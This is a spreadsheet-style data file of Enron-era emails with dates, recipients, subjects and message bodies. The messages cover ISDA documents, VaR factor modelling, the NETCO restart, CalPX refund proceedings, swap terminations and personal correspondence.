  </si>
  <si>
    <t>Def Leppard Tickets</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Matthew Lenhart/HOU/ECT on 02/21/2001 _x000D_
03:47 PM ---------------------------_x000D_
To: Matthew Lenhart/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Def Leppard Tickets_x000D_
_x000D_
Oh yeah,_x000D_
_x000D_
I am supposed to remind you or Eric to find 2 more tickets for next Thursday._x000D_
_x000D_
Lisa_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Sep 2000 00:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'smartin@steelhector.com'})</t>
  </si>
  <si>
    <t>ISDA - FPL and Enron</t>
  </si>
  <si>
    <t>Serge,_x000D_
_x000D_
I just wanted to see if you had an opportunity to review the revised Enron _x000D_
Corp. Guaranty.  I believe that it is the only document that has not been _x000D_
finalized.  Please call me at 713-220-4124 if there are any outstanding _x000D_
issues._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Jason</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 14:22:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'hayden@enron.com'})</t>
  </si>
  <si>
    <t>RE: Project X - Outside the box idea</t>
  </si>
  <si>
    <t xml:space="preserve">I think the direction we are going to go is to first increase the number of factors, then "tear" down the gas and power silos and jointly estimate._x000D_
_x000D_
Frank_x000D_
PS Immediate feedback was that patches can become legacy issues and it is best to solve issue correctly?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lew, Jaesoo  _x000D_
Sent:	Friday, June 01, 2001 2:11 PM_x000D_
To:	Hayden, Frank_x000D_
Cc:	Jia, Winston; Tamarchenko, Tanya; Kaminski, Vince J; Andrews, Naveen; Ramesh, Ganapathy; Yu, Jin; Gupta, Sanjay; White, Stacey; Gorny, Vladimir; Port, David; Stock, Stephen; Brackett, Debbie R.; Basu, Nilay_x000D_
Subject:	RE: Project X - Outside the box idea_x000D_
_x000D_
Frank,_x000D_
_x000D_
In technicality wise, I don't think it is an obstacle and the term correlations among power and NG can be obtained to use hedge purpose.  But in simulation point of view, the POWER-NG joint factors may be misleading since the "blurred" factors can be generated if the NG cores and power regions have low correlations.  _x000D_
_x000D_
However, if the power desk uses NG as a hedge, definitely the concerns on the joint factor loadings in VAR calculation are natural._x000D_
_x000D_
Jaesoo _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayden, Frank  _x000D_
Sent:	Friday, June 01, 2001 1:33 PM_x000D_
To:	Jia, Winston; Lew, Jaesoo; Tamarchenko, Tanya; Kaminski, Vince J; Andrews, Naveen; Ramesh, Ganapathy; Yu, Jin; Gupta, Sanjay; White, Stacey; Gorny, Vladimir; Port, David; Stock, Stephen; Brackett, Debbie R.; Basu, Nilay_x000D_
Subject:	Project X - Outside the box idea_x000D_
Importance:	High_x000D_
_x000D_
Since we are potentially very short of time, I wanted to "float" an idea out there for discussion and investigation.  If you believe it to be good, and we find ourselves in a jam, I want everyone to have an understanding of the proposed process.  Please think about this and realize that we may not seriously discuss this solution until the week of June 11th, when I return from vacation, at which time we can reassess the need for such a patch.  (THIS IS NOT A REQUEST TO IMPLEMENT, BUT FOR DISCUSSION ONLY.)_x000D_
_x000D_
Background:_x000D_
Factor loadings are currently done for three separate groups, natural gas, power and liquids.  There are many discussions regarding increasing the number of factors in the model and implementing PCA across the groups.  It is my understanding that joint estimation is done for each group, and the correlations in that group are embedded in those factors.  One critical problem we have in power, is that the desk hedges using NG, and that in the VAR simulation, the NG factors are "pulled" in from another factor group, i.e. the natural gas factor group, possibly causing VaR measurement issues. _x000D_
_x000D_
Additionally, in the factor loading process, one has to pre-identify potential core curves for each group.  If one were to include in each group's core curve list other curves that have been previously included in other groups, one would most likely create "factor-overkill", thereby destroying the value-at-risk engine and reducing it to nothing. (maybe I'm a little dramatic here, but you get the point?)  _x000D_
_x000D_
Idea:_x000D_
Introduce to the power core curve list and group, natural gas curves, so that risk engine would only use factors generated appropriately for power, and not have to borrow them from another group._x000D_
_x000D_
Solution:_x000D_
To do so, Enpower would have to create (and copy 60 days worth of history) and introduce, unique but also identical, natural gas curves.  These curves would be inserted to the curves utilized for creating power factors -so that the factors used for power VAR, include the appropriate NG curves (used by power traders to hedge their exposure).  These NG-PWR curves would be renamed so that they are "unique" to that commodity group and system.  Upon factors being generated, positions would have to be moved to the NG-PWR curve(s) so that Value-at-risk would pick up the new factors. (If positions are not moved, the VAR engine would pull in the factors generated in the natural gas factor loading process, not the power factor loading process...)  _x000D_
_x000D_
Additionally, factors generated in other commodity groups would not be utilized in power VAR because they wouldn't have "delta" on them,  rather the delta would be on the new NG-PWR curves, utilizing the factors appropriately generated respective to power.  _x000D_
_x000D_
(For those joint calculated factors, where we assume perfect correlation, we would have to "ensure" that those "curves" stand out and are not done jointly..)_x000D_
_x000D_
_x000D_
I recognize that this sort of patch has the potential to become a "legacy"?._x000D_
_x000D_
Let me know your thoughts,_x000D_
_x000D_
Frank_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>Tue, 18 Sep 2001 12:20:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>Mark:_x000D_
_x000D_
Attached is my work report._x000D_
_x000D_
Marie_x000D_
_x000D_
_x000D_
		 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Taylor, Mark E (Legal)  _x000D_
Sent:	Tuesday, September 18, 2001 1:53 PM_x000D_
To:	Cook, Mary; Gray, Barbara N.; Greenberg, Mark; Hendry, Brent; Koehler, Anne C.; Leite, Francisco Pinto; Nelson, Cheryl; Sayre, Frank; Shackleton, Sara; Bailey, Susan; Boyd, Samantha; Heard, Marie; Jones, Tana; Panus, Stephanie_x000D_
Subject:	Work Reports_x000D_
_x000D_
If you have not already done so this week, please remember to update your work reports for me this afternoon._x000D_
_x000D_
Mark Taylor_x000D_
Vice President and General Counsel_x000D_
Enron Wholesale Services_x000D_
(713)853-7459</t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 09:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'teiglandl@sullcrom.com'})</t>
  </si>
  <si>
    <t>FINAL (?) ISDA side letter</t>
  </si>
  <si>
    <t>.... is attached for your review, clean and blacklined versions._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
----------------------------------_x000D_
_x000D_
This e-mail is sent by a law firm and contains information_x000D_
that may be privileged and confidential. If you are not the_x000D_
intended recipient, please delete the e-mail and notify us_x000D_
immediately._x000D_
_x000D_
 - Allegheny  ENRON ISDA SIDE LETTER(v4).DOC_x000D_
 - Allegheny  ENRON ISDA SIDE LETTER(vRED).DOC</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 07:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kimberly.soulant@wcom.com'})</t>
  </si>
  <si>
    <t>Re: A Hallmark E-Card from Kim</t>
  </si>
  <si>
    <t>So you bought me a new winter coat for New York-Thanks-I ned it.  The card is _x000D_
adorable-how did you do it.  I love it.</t>
  </si>
  <si>
    <t>Mon, 26 Nov 2001 19:43:25 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeff.donahue@enron.com', 'a..howard@enron.com', 'stanley.horton@enron.com', 'rod.hayslett@enron.com', 'rob.walls@enron.com'})</t>
  </si>
  <si>
    <t>FW: Rawhide project</t>
  </si>
  <si>
    <t xml:space="preserve">Gentlemen:_x000D_
 _x000D_
The info below is a little confusing.  I was never informed until now that anything of EGAS was in Rawhide.  If this is true and Enron has conveyed these assets to a structured vehicle, then we have breached transfer obligations on almost every deal, our debt may be in default and we need to understand the consequences asap as Subic and Batangas are the subject of current negotiations._x000D_
 _x000D_
Jim Hughes_x000D_
_x000D_
-----Original Message----- _x000D_
From: Konur, Sanjay _x000D_
Sent: Mon 11/26/2001 5:21 PM _x000D_
To: Hughes, James A. _x000D_
Cc: Ji, Lian; McIntyre, Kelley _x000D_
Subject: Rawhide project_x000D_
_x000D_
_x000D_
_x000D_
Jim, _x000D_
_x000D_
Because of the nature of what they asked, I just wanted to keep you informed on this.  _x000D_
_x000D_
Global Finance has requested models, historicals, timings for disposal on the Rawhide assets.  These assets include Subic, Batangas, Guam, Gaspart, Centragas, PQPC, and TGS.  I was going to get them the info on the models and ask for Carol Howes' help on the historicals.  If neccessary, I will also set them up with people over here who can help explain the valuations._x000D_
_x000D_
Sanjay </t>
  </si>
  <si>
    <t>Tue, 23 May 2000 07:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sophie@cwconferences.co.uk'})</t>
  </si>
  <si>
    <t>Re: Oil Prices and Investment</t>
  </si>
  <si>
    <t xml:space="preserve">Thank you for the invitation to Mr. Skilling.  Unfortunately, he has a family _x000D_
commitment that will prevent his participation._x000D_
_x000D_
Regards,_x000D_
Sherri Sera_x000D_
Assistant to Jeff Skilling_x000D_
713.853.5984_x000D_
713.646.8381 (fax)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sophie Yarrow &lt;sophie@cwconferences.co.uk&gt; on 05/23/2000 12:07:59 PM_x000D_
To: jeff.skilling@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Oil Prices and Investment_x000D_
_x000D_
_x000D_
Dear Mr Skilling_x000D_
I have attached below,  the details of our third annual private retreat_x000D_
on Oil Prices and Investment which may be of interest to you.  It is_x000D_
taking place on the 10th and 11th July, at Le Meridien Piccadilly,_x000D_
London._x000D_
Every year CWC brings together a group of senior level forward thinking_x000D_
experts to discuss current issues in Oil pricing, and the implications_x000D_
for the International Oil Industry._x000D_
We have, as always, an excellent list of speakers, and we limiting_x000D_
numbers on this retreat to really encourage interaction between_x000D_
participants._x000D_
 &lt;&lt;WOP email.doc&gt;&gt;    &lt;&lt;registration form.doc&gt;&gt;_x000D_
If you require any further information, or have any queries, please_x000D_
don't hesitate to call or email me, my details are listed below._x000D_
Kind regards_x000D_
Sophie_x000D_
_x000D_
Sophie Yarrow_x000D_
The CWC Group_x000D_
Business Design Centre,_x000D_
52 Upper Street, London, N1 OQH  UK_x000D_
Tel. +44 (0)20 7704 1167_x000D_
Fax. +44 (0)20 7704 8440_x000D_
syarrow@thecwcgroup.com_x000D_
Website: http://www.thecwcgroup.com/_x000D_
_x000D_
_x000D_
 - WOP email.doc_x000D_
 - registration form.doc_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 14:01:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>The attached document is being forwarded at the request of Debra_x000D_
 Perlingiere</t>
  </si>
  <si>
    <t>_x000D_
 _x000D_
_x000D_
_x000D_
Joanne Rozycki_x000D_
Senior Administrative Assistant_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB3880D_x000D_
Houston, TX  77002_x000D_
Phone:  (713) 853-5968     Fax:      (713) 646-3490_x000D_
Email:   joanne.rozycki@enron.com</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 13:23:03 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kharris@tombrown.com'})</t>
  </si>
  <si>
    <t>frozenset({'mwhitt@enron.com'})</t>
  </si>
  <si>
    <t>Employment Inquiry</t>
  </si>
  <si>
    <t xml:space="preserve">Please see the attached._x000D_
Thanks,_x000D_
Kent_x000D_
_x000D_
 &lt;&lt;Resume Cover Letter Enron 102501.doc&gt;&gt;  &lt;&lt;Resume KHH1 102401.doc&gt;&gt; </t>
  </si>
  <si>
    <t>Sat, 5 Jan 2002 10:43:57 -0800 (PST)</t>
  </si>
  <si>
    <t>You will be sending me a plan tomorrow for all of Energy Ops though won't you?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hall, Bob M  _x000D_
Sent:	Saturday, January 05, 2002 11:02 AM_x000D_
To:	Kitchen, Louise_x000D_
Subject:	RE: NETCO_x000D_
_x000D_
I talked to Bob on Friday.  He is involved with Jay and the IT people on the system plan._x000D_
_x000D_
The only item open, I think, is a deal with EC Outlook concerning the EDI Hub.  Jay  and Bob_x000D_
McAllif are working with them. Won't need right way, used for physical gas._x000D_
_x000D_
He is also working on a list of contracts needed with the pipelines and LDC's._x000D_
_x000D_
I'll keep you posted if I see any problems with logistics._x000D_
_x000D_
thanks_x000D_
_x000D_
bob_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Saturday, January 05, 2002 10:55 AM_x000D_
To:	Hall, Bob M_x000D_
Subject:	FW: NETCO_x000D_
_x000D_
Who is doing the Gas Logistics restart plan?  Bob Superty hopefully_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Kitchen, Louise  _x000D_
Sent:	Monday, December 31, 2001 12:54 PM_x000D_
To:	Colwell, Wes; Hodges, Georgeanne; Milnthorp, Rob; Zufferli, John; Hedstrom, Peggy; Myers, Thomas; Bradford, William S.; Will, Lloyd; Beck, Sally; Hall, Bob M; Presto, Kevin M.; Forster, David; Reeves, Leslie; Gaskill, Chris; Superty, Robert; Lagrasta, Fred; Luce, Laura; Tycholiz, Barry; Redmond, Brian; Vickers, Frank; Gossett, Jeffrey C.; Arnold, John; Grigsby, Mike; Allen, Phillip K.; Neal, Scott; Martin, Thomas A.; Shively, Hunter S.; Wynne, Rita; Rub, Jenny; Webb, Jay; Haedicke, Mark E.; Buy, Rick; Calger, Christopher F.; Duran, W. David; Robinson, Mitch; Curry, Mike; Heizenrader, Tim; Belden, Tim; White, Stacey W.; Steffes, James D.; Aucoin, Berney C. ; Roberts, Mike A.; Oxley, David_x000D_
Cc:	Lavorato, John_x000D_
Subject:	NETCO_x000D_
_x000D_
The New Year has arrived and we really to finalize a lot of the work with regards to moving into NETCO.  Obviously we still do not have a deal but the deadline is approaching and preparations need to be finalized._x000D_
_x000D_
The main areas to focus on over the next week are:-_x000D_
_x000D_
(i) 	Re-start/Integration Plans (due on Jan 7)				To be forwarded to Louise	_x000D_
	These plans need to be detailed and show clear detailed timelines and detailed responsibilities for getting us up and running as soon as possible.  _x000D_
	The current restart date is January 21, 2001 but may be pushed forward to January 14, 2002.	_x000D_
(ii)	Budget (due Jan 3, 2002)						To be forwarded to Faith Killen _x000D_
	First year budget to include all start up costs (some of which can be amortized)_x000D_
(iii)	Seating Plans								Tammy Shepperd to co-ordinate_x000D_
	We need to start the planning process for seating as we will be living on floors 5 &amp; 6 of the Enron South building._x000D_
	I have asked Tammy Shepperd to commence the seating plan and we would look to start the moves as soon as possible but with a large number occuring around January 11,2002._x000D_
(iv)	Due Diligence_x000D_
	We continue the process with two new companies this week (Wednesday and Thursday). Andy Zipper is taking the lead for the company arriving on Wednesday, please help him with his requirements._x000D_
_x000D_
I would ask that both John and I are notified of any changes to the Netco personnel list on a timely fashion and that the list is maintained on a continual basis.  Please forward all alterations to Jeanie Slone who has responsibility for the master list._x000D_
_x000D_
Communication - I believe that the New Year combined with a internal communication issues may be a good time to review what we want to say on Netco and what our policies are.  I am asking David Oxley to co-ordinate with all of you on this.  I know a lot of you believe that we need to only communicate once we have retention programme in place for the estate which may be a good idea but we we need to make sure that we lose as few people as possible._x000D_
_x000D_
If you are unavailable this week, please ensure you delegate this work out._x000D_
_x000D_
Happy New Year_x000D_
_x000D_
Louise</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 10:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'gdavid@mdck.com'})</t>
  </si>
  <si>
    <t>Re: TED &amp; MARC'S CRITTERS</t>
  </si>
  <si>
    <t>Absolutely</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2000 04:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Book</t>
  </si>
  <si>
    <t>Vince,_x000D_
?_x000D_
I have made contact with Fiona Grant, Director Public Relations and  _x000D_
Communications Enron Europe Limited, and she mentioned that there are some  _x000D_
changes to your bios, which are located both on the cover and in the _x000D_
preliminary  section in "About the Authors".? We would appreciate it if you _x000D_
could help  in?collecting or passing along these edits?since  these?are?the _x000D_
only items delaying the printing of the book.?  _x000D_
Thanks Vince._x000D_
?_x000D_
Regards,_x000D_
Julie_x000D_
?_x000D_
?</t>
  </si>
  <si>
    <t>Thu, 6 Sep 2001 13:37:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'legal &lt;.hall@enron.com&gt;', 'b..sanders@enron.com'})</t>
  </si>
  <si>
    <t>RE: Comments on CalPX letter to FERC, dated Aug. 10, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">Richard,  my comments on the August 10 PX letter, having participated in th=_x000D_
e August 13 and September 5 prehearing conferences:_x000D_
_x000D_
Cal PX has always asserted its neutrality in the prehearing conferences in =_x000D_
the CA proceeding.  Although this assertion is only partially true, I think=_x000D_
 we would be barking up the wrong tree if we were to pursue the PX, given S=_x000D_
teve's correct assessment that the PX is judgment proof.=20_x000D_
_x000D_
My comments regarding the numbered paragraphs of the letter:_x000D_
_x000D_
1.=09Regarding confidentiality, there is a protective order (as amended) in=_x000D_
 place.  Despite this, my educated guess is that the protective order could=_x000D_
 very well be lifted given the rather political nature of the proceeding.  =_x000D_
Judge Birchman alluded to this possibility just yesterday at the prehearing=_x000D_
 conference.  He has also previously expressed a belief that the conduct of=_x000D_
 the proceeding could be hampered if each party's refund data is deemed to =_x000D_
be confidential.  In short, I believe there will be less confidentiality ra=_x000D_
ther than more._x000D_
_x000D_
2.-3.=09The PX is severely resource constrained.  Additionally the PX must =_x000D_
await the ISO data before it can start generating the data that the PX itse=_x000D_
lf needs to produce.  As of yesterday, the PX did not have all the ISO data=_x000D_
, and the data they did receive from ISO was riddled with errors.  This gav=_x000D_
e rise to the one month delay in the hearing schedule that the Judge ordere=_x000D_
d yesterday.  As to the $150 breakpoint issue, I understand that it should =_x000D_
not be as difficult to calculate as the PX purports, but the PX truly is un=_x000D_
derstaffed and has virtually no funds.  In any case, this probably is a moo=_x000D_
t issue since the Judge determined in the August 13 prehearing conference t=_x000D_
hat the $150 breakpoint issue is pending before the Commission, probably sh=_x000D_
ouldn't be dealt with in this proceeding and should be disposed of by stipu=_x000D_
lation.  The parties are given about a week to agree on a draft stipulation=_x000D_
 by the 12th on this and other "threshold" issues, failing which the Judge =_x000D_
will decide the stipulation issue after oral argument on the morning of 9/1=_x000D_
7.  Bottom line now on when the PX is to submit its data per the amended he=_x000D_
aring schedule- 10/19._x000D_
_x000D_
4.=09Refund implementation procedures have not received much consideration =_x000D_
as of yet.  Of course, our position is that we net our purchases and sales;=_x000D_
 not pay in and then expect to be allocated a refund.  Interestingly, the l=_x000D_
etter at 4b. foretold the finding of the Judge in the August 13 conference =_x000D_
that refunds and offsets need to be fully a part of this proceeding and the=_x000D_
 findings that he must certify to the Commission (as opposed to a matter to=_x000D_
 be taken care of outside the hearing room by compliance filing).  I am loo=_x000D_
king into the implications of allocating in accordance with a "share-fracti=_x000D_
on allocation method"=09_x000D_
_x000D_
Ray_x000D_
_x000D_
 -----Original Message-----_x000D_
From: =09Hall, Steve C. =20_x000D_
Sent:=09Wednesday, September 05, 2001 8:36 PM_x000D_
To:=09Sanders, Richard B._x000D_
Cc:=09Alvarez, Ray; Belden, Tim; 'gfergus@brobeck.com'; Steffes, James D.; =_x000D_
'dwatkiss@bracepatt.com'; Blair, Kit_x000D_
Subject:=09Comments on CalPX letter to FERC, dated Aug. 10, 2001=20_x000D_
_x000D_
Richard,_x000D_
_x000D_
Here are a few comments on the CalPX letter to FERC outlining the difficult=_x000D_
ies in calculating PX refunds. =20_x000D_
_x000D_
1.  The PX claims it is a "neutral party in this proceeding" and is only a =_x000D_
conduit for cash.  True for PX business, not true for CAISO obligations.  T=_x000D_
he CAISO holds SC's responsible for non-payment, not the SC's customers.  T=_x000D_
he PX was the SC for most of the transactions going through the day-ahead a=_x000D_
nd hour-ahead market.  Therefore, the PX is primarily liable.  I'm not sure=_x000D_
 how this helps us, though, since the PX has no money. =20_x000D_
_x000D_
2.  Page 3, SC Data.  I was unaware that the CalPX acted as SC until Februa=_x000D_
ry 28th---one month after it closed the doors on January 31st.  During this=_x000D_
 time, the CAISO was probably in violation of its Tariff, which requires SC=_x000D_
s to be creditworthy._x000D_
_x000D_
3.  Page 5.  Commandeered contracts.  What is the status of the PX's claim =_x000D_
against the State of California?  The State owes the PX, as representative =_x000D_
for its Participants, the mark-to-market value of the contracts on January =_x000D_
31st, less amounts paid by CDWR to suppliers.  If the PX won't bring this c=_x000D_
laim, its bankruptcy trustee or the PX Participants should bring this claim=_x000D_
 against the State of Califonria._x000D_
_x000D_
4.  Pages 3 and 4.  $150 Breakpoint.  I asked Kit Blair in Volume Managemen=_x000D_
t to review this letter and he said that it was his view and the view of tw=_x000D_
o other folks in VM that the PX is vastly overstating the difficulty in cal=_x000D_
culating the $150 breakpoint.  His view was that it should take hours or da=_x000D_
ys, but not weeks.  However, I do not see how we get an advantage from acce=_x000D_
lerating the calculation of refunds._x000D_
_x000D_
Finally, according to reports from Credit and VM, the remaining PX employee=_x000D_
s are not exactly the "A-team."   I suggest we should ask FERC to require t=_x000D_
he PX to document its methodology for calculating refunds, so that we can r=_x000D_
eview for errors.  Spot audits by independent auditors might be a good idea=_x000D_
, too._x000D_
_x000D_
Steve_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 May 2000 02:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steve.krimsky@enron.com'})</t>
  </si>
  <si>
    <t>Re: FL</t>
  </si>
  <si>
    <t>Miguel Vasquez now is running the model and he has the updated proforma._x000D_
Thanks_x000D_
Ben</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 08:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Rockin in the Rockies, bro</t>
  </si>
  <si>
    <t>Yo sista,_x000D_
_x000D_
Sorry I've been so MIA.  You know how it is: move to a new city, lack the_x000D_
money to buy groceries or put roof over head let alone purchase a calling_x000D_
card.  I am enjoying my internship and even starbucks (it's kind of fun!),_x000D_
but I am DEAD broke and trying to figure out how to pay rent this month.  So_x000D_
I guess nothing's new . . ._x000D_
_x000D_
Outward Bound is nice.  The "office" is an old renovated house about six_x000D_
blocks from my apartment, which is a godsend when it snows (which it did_x000D_
today, a lot).  The people here are generally really mellow - I'm sure you_x000D_
can imagine.  Lots of "bro!", "dude!" and "no worries!" like we're_x000D_
Australian surfers or something.  I actually heard somebody call some slides_x000D_
(as in picture slides) the "slidey-slides" the other day.  But they're all_x000D_
super nice, and I have my own desk and phone and voice mail, so I feel_x000D_
important.  Starbucks is pretty fucking funny (again, use your imagination)._x000D_
Everyone I work with is tall, skinny, male, goateed, and painfully in the_x000D_
closet.  And you should hear the crap that people order - they actually have_x000D_
a CODE for "half-caf" now.  Idiots - do you even know what actual coffee_x000D_
tastes like?_x000D_
_x000D_
So I heard you're moving in with Molly and Amber.  That should be fun._x000D_
Honestly, Kate, I love it here, but I think I'll be back sooner than I_x000D_
thought.  I'm starting to think I could be really happy in Portland.  But_x000D_
you can't beat the weather in Denver - it's sunny practically everyday!  And_x000D_
the guys here know how to buy pants that fit properly over their shoes.  You_x000D_
have to visit!  Our apartment is big and we could go out with Monica and it_x000D_
would be really fun!  My phone number, by the way, is (303) 777-7132.  So_x000D_
call me if you ever get those free long distance thingies that cell phones_x000D_
tend to get.  Okay, let me know the gossip in p-town.  Love, anna_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kate.Symes@enron.com [mailto:Kate.Symes@enron.com]_x000D_
Sent: Tuesday, January 16, 2001 3:16 PM_x000D_
To: annas@cobs.edu_x000D_
Subject: Are you "rocky mountain high" yet?_x000D_
_x000D_
_x000D_
How goes it, girlfriend? I just got your message - sorry I haven't been in_x000D_
touch yet, and I can give you all the excuses in the book about how I've_x000D_
been swamped with work, play, life in general, but we both know I'm just_x000D_
flaky, so there's no point in explaining it._x000D_
_x000D_
Anyway, I'm so excited to hear you're doing well in your new Rocky Mountain_x000D_
dwelling, but you left me here with no good pissing and moaning (and_x000D_
getting "pissed") buddies. So I checked out airfares to Denver, and found_x000D_
one for $118 roundtrip! Can you freakin' believe it? Anyway, you have to_x000D_
purchase and use the ticket by the end of March, so I was thinking a little_x000D_
spring break action was called for. Do you think you'd be settled enough by_x000D_
the end of March to accomodate a portly older sister for a few days? Let me_x000D_
know, and I'll do the deal._x000D_
_x000D_
Got to go - business abounds at Enron as usual. I'll try to drop you a line_x000D_
tonight when I have more time to write. Do you have a phone number? Amber_x000D_
was in Denver over the weekend, and she and Monica called me trying to get_x000D_
ahold of you, but I had no idea where to look. (Except somewhere in Denver,_x000D_
but from what I've heard it's a fairly big place.)_x000D_
_x000D_
Write back soon, or call - I want to know how the internship is. But more_x000D_
importantly, how's the unlimited Starbucks coffee?_x000D_
_x000D_
Love,_x000D_
Kate</t>
  </si>
  <si>
    <t>Thu, 17 Jan 2002 14:13:19 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sara.shackleton@enron.com', 'nancy.corbet@enron.com'})</t>
  </si>
  <si>
    <t>FW: Termination of Swaps - Cresendo, Juniper, Cgas, East Sour Lake_x000D_
 ( Hanson)</t>
  </si>
  <si>
    <t xml:space="preserve">Sara,_x000D_
_x000D_
Nancy asked me to send this summary to you._x000D_
_x000D_
Call if you have any questions._x000D_
_x000D_
Eric_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Boyt, Eric  _x000D_
Sent:	Thursday, January 17, 2002 4:10 PM_x000D_
To:	Otis, Brian_x000D_
Subject:	FW: Termination of Swaps - Cresendo, Juniper, Cgas, East Sour Lake ( Hanson)_x000D_
_x000D_
Brian,_x000D_
_x000D_
I aploligize for the delay in getting you this info._x000D_
_x000D_
 _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Cook, Mary  _x000D_
Sent:	Tuesday, January 15, 2002 5:27 PM_x000D_
To:	Mann, Kay; Shackleton, Sara; Dobin, Nora; Boyt, Eric_x000D_
Cc:	Corbet, Nancy; Tweed, Sheila_x000D_
Subject:	RE: Termination of Swaps - Cresendo, Juniper, Cgas, East Sour Lake ( Hanson)_x000D_
_x000D_
Is all this being worked with Nora Dobin?  I think some of these are in the volumetric production payment vehicles.  we need to be careful.  Nancy, will you call Nora Dobin?_x000D_
_x000D_
Eric:  are any of these tied to the production payment deals?  Please advise us all._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Mann, Kay  _x000D_
Sent:	Tuesday, January 15, 2002 5:23 PM_x000D_
To:	Shackleton, Sara_x000D_
Cc:	Corbet, Nancy; Cook, Mary; Tweed, Sheila_x000D_
Subject:	FW: Termination of Swaps - Cresendo, Juniper, Cgas, East Sour Lake ( Hanson)_x000D_
_x000D_
Sara,_x000D_
_x000D_
Looks like one of yours._x000D_
_x000D_
Kay_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Corbet, Nancy  _x000D_
Sent:	Tuesday, January 15, 2002 5:19 PM_x000D_
To:	Cook, Mary; Tweed, Sheila; Mann, Kay_x000D_
Cc:	Bushman, Teresa G._x000D_
Subject:	Termination of Swaps - Cresendo, Juniper, Cgas, East Sour Lake ( Hanson)_x000D_
_x000D_
Jesus Melendrez, who is managing the ECR portfolio, has asked that the subject swaps be terminated. None of them is in the money for ENA. I have put together a small file folder for each and Eric Boyt has been asked to provide updated values. These are in l purple folders on my desk should I not be available . I am happy to liase with Jesus but seems to me that one of the swap attorneys who is more conversant with the ISDAs, T&amp;Cs, swaps and ENA's current position re same should weigh in. Basic question is what approval is required to terminate.  The relevant interests are as follows :_x000D_
_x000D_
Cresendo Energy LLC - 50 % JEDI ll , 50 % Trutta_x000D_
Juniper - 75 % JEDI ll, 25 % Trutta_x000D_
CGAS -  100% McGarret_x000D_
East Sour Lake -100 % Trutta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Sun, 6 Jan 2002 17:30:32 -0800 (PST)</t>
  </si>
  <si>
    <t>Auction Employment Agreements with Condition Precedents</t>
  </si>
  <si>
    <t xml:space="preserve">The following e-mail is to confirm my understanding of the following verbal assurances provided to me as part of the intent and conditions for signing a contingent employment agreement/retention package related to the sale of the Enron gas and power trading business ("Enron trading business") to a new entity._x000D_
_x000D_
If a new entity purchases the Enron trading business and the contingent employment agreement executed on January 5, 2002 becomes a valid and binding agreement, Enron's management will not initiate a lawsuit to recover the 2001 performance bonus payments._x000D_
Enron and/or purchaser of the Enron trading business will seek approval from the bankruptcy judge of the 2001 performance bonus payments to eliminate any future uncertainty with respect to the validity of those payments._x000D_
To the extent the total retention $'s available for the Enron trading business employees is increased above current levels (from the leading bidder as of January 5, 2002), the intent of Enron's senior management is to make an upward adjustment to the individual employees who have committed to the new entity such that the employee maintains a substantially similar percentage of the total "pool" of retention $'s._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 07:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: PSEG Request</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 02/12/2001 03:38 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Ben F Jacoby@ECT_x000D_
02/12/2001 02:38 PM_x000D_
Sent by: Ben Jacoby@ECT_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc: Fred Mitro/HOU/ECT@ECT, Rusty Stevens/Corp/Enron@ENRON, Scott _x000D_
Healy/SF/ECT@ECT, Ben Jacoby/HOU/ECT@ECT, Carlos _x000D_
Sole/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT@ENRON _x000D_
_x000D_
Subject: Re: PSEG Request  _x000D_
_x000D_
Kay:_x000D_
_x000D_
Please see my earlier response. We should use the AES Calvert doc form._x000D_
_x000D_
_x000D_
_x000D_
Kay Mann@ENRON_x000D_
02/12/2001 01:57 PM_x000D_
